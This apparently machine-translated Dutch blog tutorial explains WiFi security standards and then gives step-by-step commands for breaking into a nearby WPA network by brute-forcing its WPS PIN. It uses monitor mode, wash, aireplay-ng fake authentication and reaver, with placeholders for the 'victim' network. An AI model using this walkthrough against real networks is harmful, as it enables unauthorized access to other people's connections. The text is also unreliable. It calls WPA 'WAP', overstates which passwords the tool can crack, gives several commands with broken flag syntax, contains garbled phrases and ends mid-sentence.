We weten allemaal dat de meeste mensen er de voorkeur aan geven om een WiFi wachtwoord aan hun draadloze verbinding te hangen. Dit kan zo simpel zijn als 12345 of zo complex als een combinatie van meerdere letters, cijfers en tekens. Nou, hier is het slechte nieuws, er is een tool met de naam reaver die kan worden gebruikt om uw WAP/WAP2 WiFi-wachtwoord te kraken.
Over WEP, WAP en WAP2
Om de functies van WEP (Wired Equivalent Privacy) te verbeteren, werd in 2003 WiFi Protected Access of WPA in het leven geroepen. Deze tijdelijke verbetering heeft nog steeds een relatief slechte beveiliging, maar is eenvoudiger te configureren. WPA maakt gebruik van Temporal Key Integrity Protocol (TKIP) voor een veiliger versleuteling dan WEP bood.
Een jaar later, in 2004, kwam WiFi Protected Access 2 beschikbaar. WPA2 heeft een sterkere beveiliging en is eenvoudiger te configureren dan de voorgaande opties. Het belangrijkste verschil met WPA2 is dat het gebruik maakt van de Advanced Encryption Standard (AES) in plaats van TKIP.
Wat u nodig heeft.
- Een WiFi-adapter die de monitormodus ondersteunt
- Een computer met WiFi
- Een nabijgelegen WPA-beveiligd WiFi-netwerk
- Reaver geïnstalleerd
- Persistentie
Ik ga ervan uit dat uw router is geconfigureerd om geen Push Button Authentication te gebruiken.(PBC)
Laten we dit doen
Eerst, als u een virtuele machine gebruikt, moet u uw USB-controller inschakelen door naar de instellingen te gaan, vervolgens op USB te klikken en uw USB-apparaat te kiezen.
NB: Zorg ervoor dat de draadloze adapter die u gebruikt, de monitormodus ondersteunt.
Daarna voert u het volgende commando uit:
iwconfig
Dit commando toont u alleen draadloze interfaces
Uitvoeren:
sudo ifconfig wlan0 down
Dit schakelt WiFi uit
Dan:
sudo airmon-ng check kill
Dit commando doodt elk proces dat kan interfereren met het gebruik van mijn interface in monitor modus. Het doodt de netwerk manager zodat er geen internet is.
Dan:
iwconfig wlan0 mode monitor
Dit commando verandert de modus van beheerde modus naar monitor modus.
Beheerde modus is de standaardmodus voor alle draadloze apparaten.
De reden waarom we de modus moeten wijzigen van beheerde in monitormodus is dat we niet alleen de pakketten willen vastleggen die het mac-adres van ons apparaat hebben, maar alle pakketten, zelfs de pakketten die naar de router en andere apparaten worden verzonden. Dit is alleen mogelijk wanneer de WiFi adapter in monitor modus staat.
Dan run:
sudo ifconfig wlan0 up
Dit brengt de wifi weer naar boven.
Dan run:
iwconfig
Dit is om te controleren of onze modus is veranderd van managed naar monitor. Als dat zo is, moet dat in de terminal worden aangegeven.
De onderstaande figuur laat zien dat de modus is gewijzigd in monitor.
wash - interface wlan0
Dit toont alle Aps met WPS die gebruik maken van de draadloze interface.
Aireplay-ng - fakeauth 30 -a<bssid> -h <macid> wlan0
Voor mac ID open een nieuw tabblad en typ ifconfig. Kopieer de eerste 12 cijfers van unspec in wlan0.
DON’t HITTER YET.
Open een ander nieuw tabblad.
Zorg ervoor dat je reaver hebt geïnstalleerd. Als dat niet zo is, voer dan het volgende commando uit.
Sudo apt-get install aircrack-ng reaver
Dit gaat Reaver installeren.
Reaver forceert de pin en koppelt die aan het doelwit. Als hij de pin heeft, gebruikt hij die om de eigenlijke WAP/WAP2-sleutel te berekenen.
Dan voer je het volgende commando uit:
Reaver - bssid<victim bssid> - channel <the channel of the victim> - interface wlan0 –vvv - no-associate
Druk op enter op dit tabblad en druk ook op enter op het andere tabblad waarvan ik zei dat je niet op enter moest drukken.
Dit zou een paar minuten moeten duren omdat het alle mogelijke combinaties uitprobeert en uiteindelijk zal het u de WPS pin, het WAP wachtwoord en de naam van de Wi-Fi
DISCLAIMER. Dit artikel is bedoeld ter lering, wij zijn niet verantwoordelijk voor enige schade die wordt veroorzaakt door ernaar te verwijzen.
Artikel door Restercuter Nyawira, een SheHacks KE-lid, trainer en liefhebber van cyberbeveiliging. Je vindt haar op LinkedIn (Restercuter Nyawira) en Twitter @Restercuter1.